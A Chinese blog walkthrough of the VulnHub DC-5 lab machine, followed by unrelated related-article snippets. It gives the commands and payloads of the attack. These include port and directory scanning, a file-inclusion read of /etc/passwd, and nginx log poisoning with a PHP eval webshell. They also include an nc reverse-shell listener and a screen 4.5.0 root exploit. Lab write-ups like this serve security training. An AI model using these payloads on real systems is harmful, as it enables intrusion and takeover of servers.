VulnHub靶机 DC-5 打靶 渗透测试详情过程

VulnHub靶机 DC-5 打靶 详细渗透测试过程

目录

  • VulnHub靶机 DC-5 打靶 详细渗透测试过程
    • 一、将靶机导入到虚拟机当中
    • 二、渗透流程
      • 主机发现
      • 端口扫描
      • 目录爆破
      • 文件包含
      • getshell
      • 反弹shell
      • 提权

一、将靶机导入到虚拟机当中

靶机地址:

https://download.vulnhub.com/dc/DC-5.zip

image-20240417225232078

image-20240417225114733

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

arp-scan -l

image-20240417225408386

端口扫描

nmap -p- 192.168.43.192

得到开放了80,111,以及41237端口

image-20240417225530315

扫描端口服务详细信息:

nmap -p80,111,41237 -sV -A 192.168.43.192

image-20240417230005698

访问80端口的web服务:

image-20240417230039242

目录爆破

dirsearch -u http://192.168.43.192 -i 200

暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录

image-20240417230345961

在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动

image-20240417233041872

image-20240417232728160

在contact.php交互界面:

image-20240417233353500

跳转页同样也发生变化:

image-20240417233417873

文件包含

说明这几个目录都包含了/footer.php文件,再次尝试爆破目录

在/thankyou.php基础上爆破

dirsearch -u http://192.168.43.192/thankyou.php -e* -i 200

image-20240417234740154

访问:

image-20240418000829186

目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功

image-20240418000909181

当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破

wfuzz -w  /usr/share/wfuzz/wordlist/general/common.txt http://192.168.43.192/thankyou.php?FUZZ=/etc/passwd

image-20240418003815549

http://192.168.43.192/thankyou.php?file=/etc/passwd

image-20240418003101999

getshell

信息收集发现web服务器为nginx,尝试包含以下日志,查看以下

image-20240418000953791

//日志路径:
/var/log/nginx/access.log

image-20240418003854931

日志信息显示出来了,其中包括url和UA头信息,我们可将一句话木马写进UA头或者url的file参数后面当中,进行getshell

image-20240418004019623

测试是否可解析php语句

image-20240418012041901

成功解析,写入一句话木马

image-20240418012024961

<?php @eval($_POST['cmd']);?>

image-20240418013718220

image-20240418013736006

蚁剑连接,getshell

image-20240418013750654

反弹shell

在蚁剑的虚拟终端执行,bash反弹没有成功,使用nc命令反弹shell

image-20240418015809763

kali端开启监听

nc -lvvp 8888

成功接收到shell

image-20240418015848511

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

提权

//查找suid权限的命令
find / -perm -u=s -type f 2>/dev/null

发现存在一个screen的命令并且版本为4.5.0,搜索一下相关漏洞

image-20240418020059416

进行漏洞检索,然后进行漏洞利用

image-20240418020150008

目标存在wget命令,可进行文件下载,那么kail使用python开启一个http服务,使用wget下载下来

python3 -m http.server 8080

image-20240418020258011

可将两个文件都下载下来,进行查看

image-20240418020351050

给予sh文件执行权限,直接执行一下试试,成功提权

chmod u+x 41154.sh
./41154.sh

image-20240418020524592

文章不妥之处,欢迎批评指正!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/630638.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【QT+OpenCV】车牌号检测 学习记录 遇到的问题

【QTOpenCV】车牌号检测 学习记录 首先在QT里面配置好OpenCV .pro文件中加入&#xff1a; INCLUDEPATH G:/opencv/build/include LIBS -L"G:/opencv/build/x64/vc14/lib"\-lopencv_core \-lopencv_imgproc \-lopencv_highgui \-lopencv_ml \-lopencv_video \-lo.c…

ElasticSearch虚拟机安装(单机版)

1.下载7.10.2 下载链接&#xff0c;选择LINUX X86_64下载 2.创建用户 useradd es也可以使用系统默认用户&#xff08;非root&#xff09;,root用户会报错 3.解压 tar xvf elasticsearch-7.10.2-linux-x86_64.tar.gz假定目录在/home/es/elasticsearch-7.10.2-linux-x86_64 …

安装Milvus的可视化工具Attu教程

提供两种方式来安装可视化工具Attu 一、docker安装 # 执行命令&#xff0c;加个 -d 在后台运行 docker run -d -p 8000:3000 -e MILVUS_URL127.0.0.1:19530 zilliz/attu:v2.2.8 至此安装完成&#xff01; 浏览器输入地址 http:127.0.0.1:8000即可访问 Attu主页 如果拉取最新…

数仓建模—数仓架构发展史

数仓建模—数仓架构发展史 时代的变迁&#xff0c;生死的轮回&#xff0c;历史长河滔滔&#xff0c;没有什么是永恒的&#xff0c;只有变化才是不变的&#xff0c;技术亦是如此&#xff0c;当你选择互联网的那一刻&#xff0c;你就相当于乘坐了一个滚滚向前的时代列车&#xf…

Redis从入门到精通(二十一)Redis最佳实践(二)mset、pipeline、慢查询优化、内存划分

文章目录 前言7.2 批处理优化7.2.1 命令执行流程7.2.2 mset7.2.3 Pipeline7.2.4 集群下的批处理7.2.4.1 问题与解决方案7.2.4.2 基于Spring的串行化执行 7.3 服务器端优化7.3.1 持久化配置7.3.2 慢查询优化7.3.2.1 什么是慢查询7.3.2.2 如何查看慢查询 7.3.3 命令及安全配置7.3…

android studio gradle 下载不下来的问题

有时候由于网络问题&#xff0c;会发现 android-studio 或 idea 下载不懂 gradle&#xff0c;可以修改 gradle-wrapper.properties 配置文件中的 distributionUrl 选项来解决这个问题。 distributionUrlhttps\://mirrors.cloud.tencent.com/gradle/gradle-5.1.1-all.zip 这个选…

【opencv】dnn示例-vit_tracker.cpp 使用OpenCV库和ViTTrack模型实现的视频追踪程序

这段代码是一个使用OpenCV库和ViTTrack模型实现的视频追踪程序。程序通过摄像头或视频文件获取图像序列&#xff0c;并对选定的目标对象进行实时追踪。 代码主要分为以下几个部分&#xff1a; 导入必要的库&#xff1a;程序开始时先导入了iostream&#xff0c;cmath以及相关Ope…

TCP-IP详解卷一:协议 第2章 链路层——阅读总结——

该内容适合程序员查看 第2章 链路层 2.1 引言 链路层有三个目的&#xff1a; 1.为IP模块发送和接收IP数据报&#xff1b; 2.为ARP模块发送ARP请求和接收ARP应答&#xff1b; 3.为RARP发送RARP请求和接收RARP应答&#xff1b; 2.2 以太网和IEEE 802封装 以太网&#xff1a;带…

视频教程下载:用ChatGPT快速提升股票投资能力

学完此视频后可以获得&#xff1a; 学习如何使用人工智能/Chatgpt进行基础/快速/高级财务与研究分析 学习如何使用人工智能/Chatgpt对任何公司进行定性投资研究 学习如何使用人工智能/Chatgpt对任何公司进行定量投资研究 学习如何使用人工智能/Chatgpt创建、预测和分析财务…

OpenHarmony UI动画-recyclerview_animators

简介 带有添加删除动画效果以及整体动画效果的list组件库 下载安装 ohpm install ohos/recyclerview-animatorsOpenHarmony ohpm 环境配置等更多内容&#xff0c;请参考如何安装OpenHarmony ohpm 包 使用说明 引入组件库 import { RecyclerView } from "ohos/recycler…

SOLIDWORKS Composer如何使用3D工具实现更真实的动画效果

当我们使用SOLIDWORKS composer创建动画时&#xff0c;往往会涉及到产品的安装与拆解&#xff0c;现实生活中我们在拆卸组装产品的时候&#xff0c;我们往往需要一些工具的协助&#xff0c;比如扳手、螺丝刀等等&#xff0c;那么我们如何在虚拟动画中也将这一过程以逼真的形式展…

前端项目的导入和启动

安装依赖 前端安装依赖只需要在控制台执行“npm i”即可。Tips&#xff1a;当我们执行的时候&#xff0c;有时候会很慢。可以考虑使用yarn或者pnpm。然而使用yarn或者pnpm有时候有一些莫名其妙的问题。所以还是得使用npm&#xff0c; 这个时候可以通过更换镜像源为淘宝镜像源。…